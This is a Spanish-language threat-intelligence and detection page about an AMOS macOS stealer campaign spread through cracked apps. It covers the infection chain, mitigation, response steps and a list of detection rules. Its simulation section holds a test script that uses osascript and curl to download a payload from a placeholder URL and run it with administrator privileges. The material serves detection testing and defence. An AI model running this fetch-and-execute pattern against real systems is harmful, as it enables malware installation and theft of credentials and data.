AMOS Stealer Apunta a macOS a Través de Aplicaciones “Crackeadas”
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe describe una campaña que distribuye Atomic macOS Stealer (AMOS) disfrazándolo como aplicaciones crackeadas o instruyendo a los usuarios a ejecutar comandos de terminal mediante copiar y pegar. Una vez ejecutado, el malware recopila un amplio conjunto de datos sensibles, incluyendo credenciales, información del navegador, billeteras de criptomonedas, archivos de aplicaciones de mensajería, perfiles de VPN y documentos personales, luego exfiltra el contenido robado a través de HTTP o HTTPS. Para evitar la detección estática, los operadores rotan dominios y URLs a lo largo de la campaña. La actividad está dirigida a usuarios de macOS, particularmente aquellos que buscan software no oficial o pirateado.
Investigación
Se utilizó telemetría de Trend Vision One para reconstruir toda la cadena de infección, comenzando con descargas de aplicaciones crackeadas desde haxmac.cc, seguido de redirección a través de dominios intermediarios, ejecución de scripts de shell maliciosos, creación de launch daemons para persistencia, preparación de datos en /tmp, compresión en archivos ZIP, y exfiltración a dominios controlados por atacantes que rotan. Los investigadores capturaron las líneas de comando relevantes, rutas de archivo e indicadores de comportamiento asociados con cada etapa del compromiso.
Mitigación
Las organizaciones deben educar a los usuarios sobre los riesgos del software crackeado y los comandos de terminal copiar y pegar, hacer cumplir los controles de Gatekeeper y notarización, y limitar la ejecución innecesaria de scripts en sistemas macOS. Los defensores también deben monitorizar la actividad sospechosa de curl and osascript y bloquear el acceso a dominios IPs maliciosos conocidos. Las detecciones en los endpoints deberían centrarse en la creación no autorizada de launch daemon, colocación oculta de archivos y comportamiento inusual de recopilación o exfiltración de archivos.
Respuesta
Si se detecta actividad de AMOS, se debe aislar el endpoint afectado, terminar los procesos maliciosos, eliminar archivos ocultos como .helper, .agent, y com.finder.helper.plist, y borrar cualquier dato preparado para la exfiltración. Las credenciales comprometidas deben ser revocadas, y se debe realizar un análisis forense en los archivos recuperados. La infraestructura maliciosa identificada debe ser bloqueada, y los contenidos de detección deben ser actualizados para monitorizar los patrones de comando observados.
Flujo de Ataque
Detecciones
Uso Sospechoso de Ditto para Archivar y Exfiltrar Archivos en macOS (vía process_creation)
Ver
Posible Preparación de Múltiples Archivos en el Directorio TMP para Exfiltración (vía file_event)
Ver
Actividad de FileGrabber de Atomic MacOS Stealer
Ver
Posible Copia de Datos de Inicio de Sesión de Chrome al Directorio TMP (vía process_creation)
Ver
IOCs (HashSha1) para detectar: Análisis de la Campaña del AMOS Stealer Dirigida a macOS a través de Aplicaciones ‘Crackeadas’
Ver
IOCs (SourceIP) para detectar: Análisis de la Campaña del AMOS Stealer Dirigida a macOS a través de Aplicaciones ‘Crackeadas’
Ver
IOCs (DestinationIP) para detectar: Análisis de la Campaña del AMOS Stealer Dirigida a macOS a través de Aplicaciones ‘Crackeadas’
Ver
Detección de la Ejecución del AMOS Stealer a través de Comandos de Terminal en macOS [Creación de Procesos en Linux]
Ver
Detección de la Ejecución del AMOS Stealer a través de AppleScript y Curl [Creación de Procesos en Linux]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación de Telemetría y Línea Base Pre-vuelo debe haber sido aprobada.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narración DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a diagnósticos erróneos.
-
Narrativa de Ataque y Comandos:
Un adversario ha obtenido un señuelo de phishing que entrega una carga útil de AppleScript corta. El script usaosascriptpara ejecutar un comando de shell (sh -c) que invocacurlpara descargar el binario del AMOS stealer desde un servidor C2 malicioso, lo guarda en el~/Library/Application Support/del usuario, y luego lo ejecuta con permisos elevados. El uso deosascript(un binario firmado por Apple) enmascara la actividad como una automatización legítima, mientras quecurlproporciona una descarga de red sigilosa. -
Script de Prueba de Regresión:
# amos_stealer_simulation.sh # Simula la ejecución del AMOS stealer en macOS usando osascript + curl # 1. Definir URL malicioso (usar un marcador de posición inofensivo por seguridad) MALICIOUS_URL="https://example.com/malicious_payload.sh" # 2. Script de Apple que ejecuta un comando de shell para descargar y ejecutar la carga útil APPLESCRIPT=$(cat <<'EOF' do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges EOF ) # 3. Ejecutar el AppleScript a través de osascript echo "$APPLESCRIPT" | osascript # 4. Pausar brevemente para permitir que la carga útil se ejecute sleep 5 -
Comandos de Limpieza:
# cleanup_amos_simulation.sh # Remover los artefactos creados por la simulación # Eliminar la carga útil descargada rm -f /tmp/payload.sh # Revocar cualquier proceso elevado temporal (si todavía está corriendo) pkill -f "/tmp/payload.sh" || true # Opcionalmente, borrar el historial de ejecución del AppleScript # (macOS no retiene un historial persistente para osascript) echo "Limpieza completa."